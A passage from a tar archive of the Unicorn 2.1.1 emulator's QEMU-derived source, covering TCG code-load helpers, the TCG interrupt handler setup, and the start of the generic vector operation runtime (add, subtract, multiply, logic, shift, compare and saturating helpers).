8 #include "atomic_template.h" #endif #undef ATOMIC_MMU_IDX /* Code access functions. */ static uint64_t full_ldub_code(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_8, true, full_ldub_code); } uint32_t cpu_ldub_code(CPUArchState *env, abi_ptr addr) { TCGMemOpIdx oi = make_memop_idx(MO_UB, cpu_mmu_index(env, true)); return full_ldub_code(env, addr, oi, 0); } static uint64_t full_lduw_code(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_TEUW, true, full_lduw_code); } uint32_t cpu_lduw_code(CPUArchState *env, abi_ptr addr) { TCGMemOpIdx oi = make_memop_idx(MO_TEUW, cpu_mmu_index(env, true)); return full_lduw_code(env, addr, oi, 0); } static uint64_t full_ldl_code(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_TEUL, true, full_ldl_code); } uint32_t cpu_ldl_code(CPUArchState *env, abi_ptr addr) { TCGMemOpIdx oi = make_memop_idx(MO_TEUL, cpu_mmu_index(env, true)); return full_ldl_code(env, addr, oi, 0); } static uint64_t full_ldq_code(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_TEQ, true, full_ldq_code); } uint64_t cpu_ldq_code(CPUArchState *env, abi_ptr addr) { TCGMemOpIdx oi = make_memop_idx(MO_TEQ, cpu_mmu_index(env, true)); return full_ldq_code(env, addr, oi, 0); } ����������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/tcg/tcg-all.c��������������������������������������������������������������0000664�0000000�0000000�00000003014�14675241067�0017464�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU System Emulator, accelerator interfaces * * Copyright (c) 2003-2008 Fabrice Bellard * Copyright (c) 2014 Red Hat Inc. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #include "sysemu/tcg.h" #include "cpu.h" #include "sysemu/cpus.h" #include "tcg/tcg.h" /* mask must never be zero, except for A20 change call */ static void tcg_handle_interrupt(CPUState *cpu, int mask) { cpu->interrupt_request |= mask; } CPUInterruptHandler cpu_interrupt_handler = tcg_handle_interrupt; ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/tcg/tcg-runtime-gvec.c�����������������������������������������������������0000664�0000000�0000000�00000114370�14675241067�0021331�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Generic vectorized operation runtime * * Copyright (c) 2018 Linaro * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/host-utils.h" #include "cpu.h" #include "exec/helper-proto.h" #include "tcg/tcg-gvec-desc.h" static inline void clear_high(void *d, intptr_t oprsz, uint32_t desc) { intptr_t maxsz = simd_maxsz(desc); intptr_t i; if (unlikely(maxsz > oprsz)) { for (i = oprsz; i < maxsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = 0; } } } void HELPER(gvec_add8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) + *(uint8_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_add16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) + *(uint16_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_add32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) + *(uint32_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_add64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) + *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_adds8)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) + (uint8_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_adds16)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) + (uint16_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_adds32)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) + (uint32_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_adds64)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) + b; } clear_high(d, oprsz, desc); } void HELPER(gvec_sub8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) - *(uint8_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_sub16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) - *(uint16_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_sub32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) - *(uint32_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_sub64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) - *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_subs8)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) - (uint8_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_subs16)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) - (uint16_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_subs32)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) - (uint32_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_subs64)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) - b; } clear_high(d, oprsz, desc); } void HELPER(gvec_mul8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) * *(uint8_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_mul16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) * *(uint16_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_mul32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) * *(uint32_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_mul64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) * *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_muls8)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) * (uint8_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_muls16)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) * (uint16_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_muls32)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) * (uint32_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_muls64)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) * b; } clear_high(d, oprsz, desc); } void HELPER(gvec_neg8)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = -*(uint8_t *)((char *)a + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_neg16)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = -*(uint16_t *)((char *)a + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_neg32)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { #ifdef _MSC_VER *(uint32_t *)((char *)d + i) = 0U - *(uint32_t *)((char *)a + i); #else *(uint32_t *)((char *)d + i) = -*(uint32_t *)((char *)a + i); #endif } clear_high(d, oprsz, desc); } void HELPER(gvec_neg64)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { #ifdef _MSC_VER *(uint64_t *)((char *)d + i) = 0ULL - *(uint64_t *)((char *)a + i); #else *(uint64_t *)((char *)d + i) = -*(uint64_t *)((char *)a + i); #endif } clear_high(d, oprsz, desc); } void HELPER(gvec_abs8)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int8_t)) { int8_t aa = *(int8_t *)((char *)a + i); *(int8_t *)((char *)d + i) = aa < 0 ? -aa : aa; } clear_high(d, oprsz, desc); } void HELPER(gvec_abs16)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int16_t)) { int16_t aa = *(int16_t *)((char *)a + i); *(int16_t *)((char *)d + i) = aa < 0 ? -aa : aa; } clear_high(d, oprsz, desc); } void HELPER(gvec_abs32)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int32_t)) { int32_t aa = *(int32_t *)((char *)a + i); *(int32_t *)((char *)d + i) = aa < 0 ? -aa : aa; } clear_high(d, oprsz, desc); } void HELPER(gvec_abs64)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int64_t)) { int64_t aa = *(int64_t *)((char *)a + i); *(int64_t *)((char *)d + i) = aa < 0 ? -aa : aa; } clear_high(d, oprsz, desc); } void HELPER(gvec_mov)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); memcpy(d, a, oprsz); clear_high(d, oprsz, desc); } void HELPER(gvec_dup64)(void *d, uint32_t desc, uint64_t c) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; if (c == 0) { oprsz = 0; } else { for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = c; } } clear_high(d, oprsz, desc); } void HELPER(gvec_dup32)(void *d, uint32_t desc, uint32_t c) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; if (c == 0) { oprsz = 0; } else { for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = c; } } clear_high(d, oprsz, desc); } void HELPER(gvec_dup16)(void *d, uint32_t desc, uint32_t c) { HELPER(gvec_dup32)(d, desc, 0x00010001 * (c & 0xffff)); } void HELPER(gvec_dup8)(void *d, uint32_t desc, uint32_t c) { HELPER(gvec_dup32)(d, desc, 0x01010101 * (c & 0xff)); } void HELPER(gvec_not)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = ~*(uint64_t *)((char *)a + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_and)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) & *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_or)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) | *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_xor)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) ^ *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_andc)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) &~ *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_orc)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) |~ *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_nand)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = ~(*(uint64_t *)((char *)a + i) & *(uint64_t *)((char *)b + i)); } clear_high(d, oprsz, desc); } void HELPER(gvec_nor)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = ~(*(uint64_t *)((char *)a + i) | *(uint64_t *)((char *)b + i)); } clear_high(d, oprsz, desc); } void HELPER(gvec_eqv)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = ~(*(uint64_t *)((char *)a + i) ^ *(uint64_t *)((char *)b + i)); } clear_high(d, oprsz, desc); } void HELPER(gvec_ands)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) & b; } clear_high(d, oprsz, desc); } void HELPER(gvec_xors)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) ^ b; } clear_high(d, oprsz, desc); } void HELPER(gvec_ors)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) | b; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl8i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) << shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl16i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) << shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl32i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) << shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl64i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) << shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr8i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr16i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr32i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr64i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar8i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(int8_t *)((char *)d + i) = *(int8_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar16i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(int16_t *)((char *)d + i) = *(int16_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar32i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(int32_t *)((char *)d + i) = *(int32_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar64i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(int64_t *)((char *)d + i) = *(int64_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl8v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { uint8_t sh = *(uint8_t *)((char *)b + i) & 7; *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) << sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl16v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { uint8_t sh = *(uint16_t *)((char *)b + i) & 15; *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) << sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl32v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { uint8_t sh = *(uint32_t *)((char *)b + i) & 31; *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) << sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl64v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint8_t sh = *(uint64_t *)((char *)b + i) & 63; *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) << sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr8v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { uint8_t sh = *(uint8_t *)((char *)b + i) & 7; *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr16v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { uint8_t sh = *(uint16_t *)((char *)b + i) & 15; *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr32v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { uint8_t sh = *(uint32_t *)((char *)b + i) & 31; *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr64v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint8_t sh = *(uint64_t *)((char *)b + i) & 63; *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar8v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int8_t)) { uint8_t sh = *(uint8_t *)((char *)b + i) & 7; *(int8_t *)((char *)d + i) = *(int8_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar16v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int16_t)) { uint8_t sh = *(uint16_t *)((char *)b + i) & 15; *(int16_t *)((char *)d + i) = *(int16_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar32v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int32_t)) { uint8_t sh = *(uint32_t *)((char *)b + i) & 31; *(int32_t *)((char *)d + i) = *(int32_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar64v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int64_t)) { uint8_t sh = *(uint64_t *)((char *)b + i) & 63; *(int64_t *)((char *)d + i) = *(int64_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } #define DO_CMP1(NAME, TYPE, OP) \ void HELPER(NAME)(void *d, void *a, void *b, uint32_t desc) \ { \ intptr_t oprsz = simd_oprsz(desc); \ intptr_t i; \ for (i = 0; i < oprsz; i += sizeof(TYPE)) { \ *(TYPE *)((char *)d + i) = -(*(TYPE *)((char *)a + i) OP *(TYPE *)((char *)b + i)); \ } \ clear_high(d, oprsz, desc); \ } #define DO_CMP2(SZ) \ DO_CMP1(gvec_eq##SZ, uint##SZ##_t, ==) \ DO_CMP1(gvec_ne##SZ, uint##SZ##_t, !=) \ DO_CMP1(gvec_lt##SZ, int##SZ##_t, <) \ DO_CMP1(gvec_le##SZ, int##SZ##_t, <=) \ DO_CMP1(gvec_ltu##SZ, uint##SZ##_t, <) \ DO_CMP1(gvec_leu##SZ, uint##SZ##_t, <=) DO_CMP2(8) DO_CMP2(16) DO_CMP2(32) DO_CMP2(64) #undef DO_CMP1 #undef DO_CMP2 void HELPER(gvec_ssadd8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int8_t)) { int r = *(int8_t *)((char *)a + i) + *(int8_t *)((char *)b + i); if (r > INT8_MAX) { r = INT8_MAX; } else if (r < INT8_MIN) { r = INT8_MIN; } *(int8_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_ssadd16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int16_t)) { int r = *(int16_t *)((char *)a + i) + *(int16_t *)((char *)b + i); if (r > INT16_MAX) { r = INT16_MAX; } else if (r < INT16_MIN) { r = INT16_MIN; } *(int16_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_ssadd32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int32_t)) { int32_t ai = 